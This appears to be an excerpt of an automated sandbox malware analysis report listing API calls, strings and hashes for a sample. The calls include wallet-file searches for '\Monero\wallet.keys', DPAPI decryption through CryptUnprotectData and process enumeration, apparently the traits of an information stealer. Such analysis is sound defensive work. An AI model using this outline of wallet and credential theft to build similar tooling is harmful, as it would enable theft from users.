                    • Opcode ID: d0d5f625b4fc16d380b1c96bbab198f630c2cfeaeee953af2d15ec224228a81a
                    • Instruction ID: 10718742893f32431eac0e05c4f89af64281dd73506a2a9178321904990090b2
                    • Opcode Fuzzy Hash: d0d5f625b4fc16d380b1c96bbab198f630c2cfeaeee953af2d15ec224228a81a
                    • Instruction Fuzzy Hash: 2FB154719001199BCB24FF64DC95FEDB3B9AF54300F4085E9A80AA6291FF316B49CF96
                    APIs
                      • Part of subcall function 00BDA740: lstrcpy.KERNEL32(00BE0E17,00000000), ref: 00BDA788
                    • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00BE510C,?,?,?,00BE51B4,?,?,00000000,?,00000000), ref: 00BC1923
                    • StrCmpCA.SHLWAPI(?,00BE525C), ref: 00BC1973
                    • StrCmpCA.SHLWAPI(?,00BE5304), ref: 00BC1989
                    • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00BC1D40
                    • DeleteFileA.KERNEL32(00000000), ref: 00BC1DCA
                    • FindNextFileA.KERNEL32(000000FF,?), ref: 00BC1E20
                    • FindClose.KERNEL32(000000FF), ref: 00BC1E32
                      • Part of subcall function 00BDA920: lstrcpy.KERNEL32(00000000,?), ref: 00BDA972
                      • Part of subcall function 00BDA920: lstrcat.KERNEL32(00000000), ref: 00BDA982
                      • Part of subcall function 00BDA9B0: lstrlen.KERNEL32(?,013C9238,?,\Monero\wallet.keys,00BE0E17), ref: 00BDA9C5
                      • Part of subcall function 00BDA9B0: lstrcpy.KERNEL32(00000000), ref: 00BDAA04
                      • Part of subcall function 00BDA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00BDAA12
                      • Part of subcall function 00BDA8A0: lstrcpy.KERNEL32(?,00BE0E17), ref: 00BDA905
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1747919128.0000000000BC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_bc0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
                    • String ID: \*.*
                    • API String ID: 1415058207-1173974218
                    • Opcode ID: e0455a99d2dd95708a97dc8fe0418b7a9f5ebe826d124a91c6db1f0137348fdd
                    • Instruction ID: 1fa7172189ba321dfa883dd4914a879e11965fcfbfda815b83b845c90342a50e
                    • Opcode Fuzzy Hash: e0455a99d2dd95708a97dc8fe0418b7a9f5ebe826d124a91c6db1f0137348fdd
                    • Instruction Fuzzy Hash: 711232719101589BCB15FB60CCA6EEEB3B8AF54300F4045EAB50A62291FF356F89CF91
                    APIs
                      • Part of subcall function 00BDA740: lstrcpy.KERNEL32(00BE0E17,00000000), ref: 00BDA788
                      • Part of subcall function 00BDA9B0: lstrlen.KERNEL32(?,013C9238,?,\Monero\wallet.keys,00BE0E17), ref: 00BDA9C5
                      • Part of subcall function 00BDA9B0: lstrcpy.KERNEL32(00000000), ref: 00BDAA04
                      • Part of subcall function 00BDA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00BDAA12
                      • Part of subcall function 00BDA8A0: lstrcpy.KERNEL32(?,00BE0E17), ref: 00BDA905
                    • FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,00BE0C2E), ref: 00BCDE5E
                    • StrCmpCA.SHLWAPI(?,00BE14C8), ref: 00BCDEAE
                    • StrCmpCA.SHLWAPI(?,00BE14CC), ref: 00BCDEC4
                    • FindNextFileA.KERNEL32(000000FF,?), ref: 00BCE3E0
                    • FindClose.KERNEL32(000000FF), ref: 00BCE3F2
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1747919128.0000000000BC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_bc0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Findlstrcpy$File$CloseFirstNextlstrcatlstrlen
                    • String ID: \*.*
                    • API String ID: 2325840235-1173974218
                    • Opcode ID: 1ce0c2ab5de7d506262ff0d1aaf243e8b0934260c3149ce9fb16f9b3777fd5b3
                    • Instruction ID: 769a6049ed9fcf113e8aa71a65345a4410e9e6f1a2619c751ea0a226ce4aecdb
                    • Opcode Fuzzy Hash: 1ce0c2ab5de7d506262ff0d1aaf243e8b0934260c3149ce9fb16f9b3777fd5b3
                    • Instruction Fuzzy Hash: 89F1BF718101589ADB15FB60CC95EEEB3B8BF14300F9041EAA41A72291FF356F8ADF65
                    APIs
                      • Part of subcall function 00BDA740: lstrcpy.KERNEL32(00BE0E17,00000000), ref: 00BDA788
                      • Part of subcall function 00BDA920: lstrcpy.KERNEL32(00000000,?), ref: 00BDA972
                      • Part of subcall function 00BDA920: lstrcat.KERNEL32(00000000), ref: 00BDA982
                      • Part of subcall function 00BDA9B0: lstrlen.KERNEL32(?,013C9238,?,\Monero\wallet.keys,00BE0E17), ref: 00BDA9C5
                      • Part of subcall function 00BDA9B0: lstrcpy.KERNEL32(00000000), ref: 00BDAA04
                      • Part of subcall function 00BDA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00BDAA12
                      • Part of subcall function 00BDA8A0: lstrcpy.KERNEL32(?,00BE0E17), ref: 00BDA905
                    • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00BE14B0,00BE0C2A), ref: 00BCDAEB
                    • StrCmpCA.SHLWAPI(?,00BE14B4), ref: 00BCDB33
                    • StrCmpCA.SHLWAPI(?,00BE14B8), ref: 00BCDB49
                    • FindNextFileA.KERNEL32(000000FF,?), ref: 00BCDDCC
                    • FindClose.KERNEL32(000000FF), ref: 00BCDDDE
                    Memory Dump Source
                    • Source File: 00000000.00000002.1747919128.0000000000BC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_bc0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                    • String ID:
                    • API String ID: 3334442632-0
                    • Opcode ID: 7db94f82ff1fd6215de1d3914450a3b7297c2484b8e4e2b1b0583a0cad9ea90e
                    • Instruction ID: 5600f7d1563ef7419616018bda83c40139345399e11d957953cc1eb17885d906
                    • Opcode Fuzzy Hash: 7db94f82ff1fd6215de1d3914450a3b7297c2484b8e4e2b1b0583a0cad9ea90e
                    • Instruction Fuzzy Hash: B59148769001085BCB14FB74DC56EEDB3BCAB94300F4085F9F91AA6281FE359B498B96
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1749282027.0000000000E1E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_bc0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID: Xo$'m|N$23G$A;w_$B~}$]%f9$u?_;$zWm
                    • API String ID: 0-2154948658
                    • Opcode ID: 654c25ee025d3a0ba96f37512eaeeca2cbd3484c1120637d48df5255280c981f
                    • Instruction ID: 8cea16275648150309f097ad6b7d814432808401b60a84fad8bf7f4c3167f6da
                    • Opcode Fuzzy Hash: 654c25ee025d3a0ba96f37512eaeeca2cbd3484c1120637d48df5255280c981f
                    • Instruction Fuzzy Hash: F5B21BF3A0C210AFE7046E2DEC8567ABBE9EFD4720F16493DE6C5C3744EA3558058692
                    APIs
                      • Part of subcall function 00BDA740: lstrcpy.KERNEL32(00BE0E17,00000000), ref: 00BDA788
                    • GetKeyboardLayoutList.USER32(00000000,00000000,00BE05AF), ref: 00BD7BE1
                    • LocalAlloc.KERNEL32(00000040,?), ref: 00BD7BF9
                    • GetKeyboardLayoutList.USER32(?,00000000), ref: 00BD7C0D
                    • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 00BD7C62
                    • LocalFree.KERNEL32(00000000), ref: 00BD7D22
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1747919128.0000000000BC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_bc0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                    • String ID: /
                    • API String ID: 3090951853-4001269591
                    • Opcode ID: eaedcd783a91b6d99a482a79e8e4071f2a9dce4a2d04ec279b0738c99c31bea8
                    • Instruction ID: f6873298fc699ba3361e65432f99f8f8c84506359b39d27c1e7fd796ed107abc
                    • Opcode Fuzzy Hash: eaedcd783a91b6d99a482a79e8e4071f2a9dce4a2d04ec279b0738c99c31bea8
                    • Instruction Fuzzy Hash: 9A412A71950218ABDB24DB94DC99BEEF3B8FB44700F2041DAE40962291EB742F85CFA1
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1749282027.0000000000E1E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_bc0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID: FP9O$FP9O$VsfD$WV=y$h/$r>7{$we?s
                    • API String ID: 0-3137143347
                    • Opcode ID: 8372acc3f7e305b0484b5f5ef06f45da827abf3941ac6c4b080bf2c423f28fa2
                    • Instruction ID: 8f29e36c386c67e663b01136c36888d7c13e02f886d3abff06adde71dbc12805
                    • Opcode Fuzzy Hash: 8372acc3f7e305b0484b5f5ef06f45da827abf3941ac6c4b080bf2c423f28fa2
                    • Instruction Fuzzy Hash: 07B2E3B3A0C2009FE304AE29DC8567AFBE5EF94720F16493DE6C4C7744EA3598458B97
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1749282027.0000000000E1E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_bc0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID: )A}$<+F;$@G{o$N[Dw$R<d$_B;$}0d
                    • API String ID: 0-859064206
                    • Opcode ID: b6c4a8b6ee565442b3a41038b1d5b82e211e2a59c82b0a48830f4e4dafbc052d
                    • Instruction ID: c9612585b55d8ee04648aa67f3bd8c8aac29593622c62ab548496817dd8a8a04
                    • Opcode Fuzzy Hash: b6c4a8b6ee565442b3a41038b1d5b82e211e2a59c82b0a48830f4e4dafbc052d
                    • Instruction Fuzzy Hash: DFB2F5F3A0C2049FE304AE29EC8577AF7E5EF94720F1A493DEAC483744EA3558058697
                    APIs
                      • Part of subcall function 00BDA740: lstrcpy.KERNEL32(00BE0E17,00000000), ref: 00BDA788
                      • Part of subcall function 00BDA920: lstrcpy.KERNEL32(00000000,?), ref: 00BDA972
                      • Part of subcall function 00BDA920: lstrcat.KERNEL32(00000000), ref: 00BDA982
                      • Part of subcall function 00BDA9B0: lstrlen.KERNEL32(?,013C9238,?,\Monero\wallet.keys,00BE0E17), ref: 00BDA9C5
                      • Part of subcall function 00BDA9B0: lstrcpy.KERNEL32(00000000), ref: 00BDAA04
                      • Part of subcall function 00BDA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00BDAA12
                      • Part of subcall function 00BDA8A0: lstrcpy.KERNEL32(?,00BE0E17), ref: 00BDA905
                    • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,\*.*,00BE0D73), ref: 00BCE4A2
                    • StrCmpCA.SHLWAPI(?,00BE14F8), ref: 00BCE4F2
                    • StrCmpCA.SHLWAPI(?,00BE14FC), ref: 00BCE508
                    • FindNextFileA.KERNEL32(000000FF,?), ref: 00BCEBDF
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1747919128.0000000000BC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_bc0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: lstrcpy$FileFindlstrcat$FirstNextlstrlen
                    • String ID: \*.*
                    • API String ID: 433455689-1173974218
                    • Opcode ID: abdaf73f85e09fd795d7355d25d10c24a8347fdb7c5701a1531037470b40a0c0
                    • Instruction ID: 440e8f189655a46c64bc6f31dc3f31f2ae6653caf230190287236122e55e4527
                    • Opcode Fuzzy Hash: abdaf73f85e09fd795d7355d25d10c24a8347fdb7c5701a1531037470b40a0c0
                    • Instruction Fuzzy Hash: 121253719101189ADB14FB60DCA6EEDB3B8AF54300F4045EAB50AA2291FF356F49CF96
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1749282027.0000000000E1E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_bc0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID: !L:$+Q-o$L~/$XJ{$prW7$/ X
                    • API String ID: 0-1845434315
                    • Opcode ID: 939cb30bcca18f939fef13bb9b53650a183bf6d1f137a5cc6350e90673ba04e6
                    • Instruction ID: 7a1b5e73110b89a2780a7953abb57e609f9fcc263000b1469fc44004af333ad4
                    • Opcode Fuzzy Hash: 939cb30bcca18f939fef13bb9b53650a183bf6d1f137a5cc6350e90673ba04e6
                    • Instruction Fuzzy Hash: 5B7207F360C2049FE3046E2DEC8567AF7E9EF94720F1A863DE6C483744EA3558458796
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1749282027.0000000000E1E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_bc0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID: E;O$fj$z7$tq}w$y1S;
                    • API String ID: 0-1170751594
                    • Opcode ID: ddd43219d8a78af3428973c6227ddd66196aeb18dd10d1e48549b2065b5fbff8
                    • Instruction ID: 4896fdff101c6fe55e7218141ca04db78263a3d5e08105b23fbc47bde1cd01d3
                    • Opcode Fuzzy Hash: ddd43219d8a78af3428973c6227ddd66196aeb18dd10d1e48549b2065b5fbff8
                    • Instruction Fuzzy Hash: 9EB22AF3A082149FE304AE2DDC8566AF7E9EF94720F1A493DE6C4C3744EA3598058697
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1749282027.0000000000E1E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_bc0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID: 2Ok$E_sw$OW_~$Y[e\$zl_m
                    • API String ID: 0-4047140572
                    • Opcode ID: bd63c1ef630c6262ff9454d3bb8680bb82d722d513300b9e8fb2cf6cd5b2ade2
                    • Instruction ID: aacd9f3968a6da0779c746db9e80ced586dd0c7d3943513a7f0c43b12a31ad91
                    • Opcode Fuzzy Hash: bd63c1ef630c6262ff9454d3bb8680bb82d722d513300b9e8fb2cf6cd5b2ade2
                    • Instruction Fuzzy Hash: 29B206F360C6049FE3086E2DEC8567ABBEAEF94320F1A493DE6C5C7344EA3558058657
                    APIs
                    • lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 00BCC871
                    • CryptStringToBinaryA.CRYPT32(?,00000000), ref: 00BCC87C
                    • lstrcat.KERNEL32(?,00BE0B46), ref: 00BCC943
                    • lstrcat.KERNEL32(?,00BE0B47), ref: 00BCC957
                    • lstrcat.KERNEL32(?,00BE0B4E), ref: 00BCC978
                    Memory Dump Source
                    • Source File: 00000000.00000002.1747919128.0000000000BC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_bc0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: lstrcat$BinaryCryptStringlstrlen
                    • String ID:
                    • API String ID: 189259977-0
                    • Opcode ID: 7e5a16bf4e08379e2945133fc09bdfa78468b861461bbda67c5371aaa6640d3a
                    • Instruction ID: e0684b0294fb69e0f279ee2d7f22d9a8e473853ef656a4826edd4e328c390761
                    • Opcode Fuzzy Hash: 7e5a16bf4e08379e2945133fc09bdfa78468b861461bbda67c5371aaa6640d3a
                    • Instruction Fuzzy Hash: 21415E7590421EDFDB10DFA0DD89BFEBBB8BB48304F1441A8E509A6280D7B55A84CF92
                    APIs
                    • GetProcessHeap.KERNEL32(00000008,00000400), ref: 00BC724D
                    • RtlAllocateHeap.NTDLL(00000000), ref: 00BC7254
                    • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 00BC7281
                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,00000000), ref: 00BC72A4
                    • LocalFree.KERNEL32(?), ref: 00BC72AE
                    Memory Dump Source
                    • Source File: 00000000.00000002.1747919128.0000000000BC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_bc0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Heap$AllocateByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                    • String ID:
                    • API String ID: 2609814428-0
                    • Opcode ID: b94fd1ada8fb7d55bf1b960e1dd086852abb2ba87e235f6cac0867afe5f5bf75
                    • Instruction ID: db07927a8f5f6402e8eb23192a2c4f10936d5e10342b905cad42772fc4f797d8
                    • Opcode Fuzzy Hash: b94fd1ada8fb7d55bf1b960e1dd086852abb2ba87e235f6cac0867afe5f5bf75
                    • Instruction Fuzzy Hash: 27014071A40308BFEB14DBD4CD49F9D77B8EB44700F148058FB05BA2C0CAB1AA448B65
                    APIs
                    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00BD961E
                    • Process32First.KERNEL32(00BE0ACA,00000128), ref: 00BD9632
                    • Process32Next.KERNEL32(00BE0ACA,00000128), ref: 00BD9647
                    • StrCmpCA.SHLWAPI(?,00000000), ref: 00BD965C
                    • CloseHandle.KERNEL32(00BE0ACA), ref: 00BD967A
                    Memory Dump Source
                    • Source File: 00000000.00000002.1747919128.0000000000BC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true
                    • Associated: 00000000.00000002.1747719148.0000000000BC0000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1747919128.0000000000C71000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1747919128.0000000000C7D000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1747919128.0000000000CA2000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1747919128.0000000000E0A000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749282027.0000000000E1E000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749282027.0000000000F97000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749282027.000000000106B000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749282027.0000000001090000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749282027.000000000109A000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749282027.00000000010A7000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749524358.00000000010A8000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749615998.0000000001234000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749634982.0000000001235000.00000080.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_bc0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                    • String ID:
                    • API String ID: 420147892-0
                    • Opcode ID: c6d576489be61294f14666172ae6929fceba1117ee9deefc7de74a95928f1d84
                    • Instruction ID: dedd8fed2497fd529b0998a9b929dfa9882230ad8c2cf3dacfd85ceaa4a62269
                    • Opcode Fuzzy Hash: c6d576489be61294f14666172ae6929fceba1117ee9deefc7de74a95928f1d84
                    • Instruction Fuzzy Hash: 6E01E975A00208AFDB14DFA5C988BEDB7F8EB48700F148199A905A6240E7759A84CF51
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1749282027.0000000000E1E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true
                    • Associated: 00000000.00000002.1747719148.0000000000BC0000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1747919128.0000000000BC1000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1747919128.0000000000C71000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1747919128.0000000000C7D000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1747919128.0000000000CA2000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1747919128.0000000000E0A000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749282027.0000000000F97000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749282027.000000000106B000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749282027.0000000001090000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749282027.000000000109A000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749282027.00000000010A7000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749524358.00000000010A8000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749615998.0000000001234000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749634982.0000000001235000.00000080.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_bc0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID: #)r$.T<O$4w,$kz
                    • API String ID: 0-4195102005
                    • Opcode ID: cd554acc4e5604051a7080d3ff0d288fa7c97e42eeb479feb215166064da22a8
                    • Instruction ID: fdee92c980fd0e8bb6cba50b291c8b638a671ab587bc9d1046836a4bf6919c63
                    • Opcode Fuzzy Hash: cd554acc4e5604051a7080d3ff0d288fa7c97e42eeb479feb215166064da22a8
                    • Instruction Fuzzy Hash: 0FB205F360C204AFE3046E2DEC8567AFBE9EF94720F1A493DEAC483744E63558458697
                    APIs
                      • Part of subcall function 00BDA740: lstrcpy.KERNEL32(00BE0E17,00000000), ref: 00BDA788
                    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00BE05B7), ref: 00BD86CA
                    • Process32First.KERNEL32(?,00000128), ref: 00BD86DE
                    • Process32Next.KERNEL32(?,00000128), ref: 00BD86F3
                      • Part of subcall function 00BDA9B0: lstrlen.KERNEL32(?,013C9238,?,\Monero\wallet.keys,00BE0E17), ref: 00BDA9C5
                      • Part of subcall function 00BDA9B0: lstrcpy.KERNEL32(00000000), ref: 00BDAA04
                      • Part of subcall function 00BDA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00BDAA12
                      • Part of subcall function 00BDA8A0: lstrcpy.KERNEL32(?,00BE0E17), ref: 00BDA905
                    • CloseHandle.KERNEL32(?), ref: 00BD8761
                    Memory Dump Source
                    • Source File: 00000000.00000002.1747919128.0000000000BC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true
                    • Associated: 00000000.00000002.1747719148.0000000000BC0000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1747919128.0000000000C71000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1747919128.0000000000C7D000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1747919128.0000000000CA2000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1747919128.0000000000E0A000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749282027.0000000000E1E000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749282027.0000000000F97000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749282027.000000000106B000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749282027.0000000001090000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749282027.000000000109A000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749282027.00000000010A7000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749524358.00000000010A8000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749615998.0000000001234000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749634982.0000000001235000.00000080.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_bc0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                    • String ID:
                    • API String ID: 1066202413-0
                    • Opcode ID: 025ce30b116498f3555451225bc9e2bf912ca8ac83244745ec40117e399acc82
                    • Instruction ID: c92870f69fa8995d5b87a724b43aa4b80f3e7e1d9fc07e641a09be7f5a11014a
                    • Opcode Fuzzy Hash: 025ce30b116498f3555451225bc9e2bf912ca8ac83244745ec40117e399acc82
                    • Instruction Fuzzy Hash: 65316F71901258ABCB24DF51CC85FEEF7B8EB44700F1041EAE509B22A0EB716E45CFA1
                    APIs
                    • CryptBinaryToStringA.CRYPT32(00000000,00BC5184,40000001,00000000,00000000,?,00BC5184), ref: 00BD8EC0
                    Memory Dump Source
                    • Source File: 00000000.00000002.1747919128.0000000000BC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true
                    • Associated: 00000000.00000002.1747719148.0000000000BC0000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1747919128.0000000000C71000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1747919128.0000000000C7D000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1747919128.0000000000CA2000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1747919128.0000000000E0A000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749282027.0000000000E1E000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749282027.0000000000F97000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749282027.000000000106B000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749282027.0000000001090000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749282027.000000000109A000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749282027.00000000010A7000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749524358.00000000010A8000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749615998.0000000001234000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749634982.0000000001235000.00000080.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_bc0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: BinaryCryptString
                    • String ID:
                    • API String ID: 80407269-0
                    • Opcode ID: be958b89e510f6498b28fd65db7c0b4e6f457c8ac2ce79bafb82fc99c8c4d505
                    • Instruction ID: 437a2de6a1195ebcea097bce7bad99ad3747a0b975da55e5050ab0be4365887f
                    • Opcode Fuzzy Hash: be958b89e510f6498b28fd65db7c0b4e6f457c8ac2ce79bafb82fc99c8c4d505
                    • Instruction Fuzzy Hash: B2110A74200208BFDB04CF65E884FA673EAEF89301F149999F915CB350EB35E881DB60
                    APIs
                    • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00BC4EEE,00000000,00000000), ref: 00BC9AEF
                    • LocalAlloc.KERNEL32(00000040,?,?,?,00BC4EEE,00000000,?), ref: 00BC9B01
                    • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00BC4EEE,00000000,00000000), ref: 00BC9B2A
                    • LocalFree.KERNEL32(?,?,?,?,00BC4EEE,00000000,?), ref: 00BC9B3F
                    Memory Dump Source
                    • Source File: 00000000.00000002.1747919128.0000000000BC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true
                    • Associated: 00000000.00000002.1747719148.0000000000BC0000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1747919128.0000000000C71000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1747919128.0000000000C7D000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1747919128.0000000000CA2000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1747919128.0000000000E0A000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749282027.0000000000E1E000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749282027.0000000000F97000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749282027.000000000106B000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1749282027.0000000001090000.00000040.00000001.01000000.00000003.sdmp
